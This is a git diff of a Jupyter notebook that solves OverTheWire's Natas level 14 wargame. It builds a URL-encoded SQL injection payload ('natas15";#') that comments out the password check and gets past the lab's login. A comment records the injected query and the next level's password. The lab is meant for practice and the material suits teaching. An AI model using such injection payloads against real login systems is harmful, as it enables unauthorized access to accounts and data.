--- a/Natas/natas14.ipynb
+++ b/Natas/natas14.ipynb
@@ -2,23 +2,33 @@
  "cells": [
   {
    "cell_type": "code",
-   "execution_count": 1,
+   "execution_count": 11,
    "metadata": {},
    "outputs": [
     {
      "name": "stdout",
      "output_type": "stream",
      "text": [
-      "?username=ParseResult(scheme='', netloc='', path='admin\"', params='SELECT * from users;', query='', fragment='')&password=ParseResult(scheme='', netloc='', path='123', params='', query='', fragment='')&debug=0\n"
+      "http://natas14.natas.labs.overthewire.org/index.php?username=natas15%22%3B%23&password=123&debug=0\n"
      ]
     }
    ],
    "source": [
-    "from urllib.parse import urlparse\n",
-    "username = 'admin\";SELECT * from users;#'\n",
+    "import urllib.parse\n",
+    "username = 'natas15\";#'\n",
     "password = \"123\"\n",
     "\n",
-    "print(f\"?username={urlparse(username).path}&password={urlparse(password.path)}&debug=0\")"
+    "print(f\"http://natas14.natas.labs.overthewire.org/index.php?username={urllib.parse.quote(username)}&password={urllib.parse.quote(password)}&debug=0\")"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": null,
+   "metadata": {},
+   "outputs": [],
+   "source": [
+    "# Executing query: SELECT * from users where username=\"natas15\";#\" and password=\"123\"\n",
+    "# Successful login! The password for natas15 is TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB"
    ]
   }
  ],
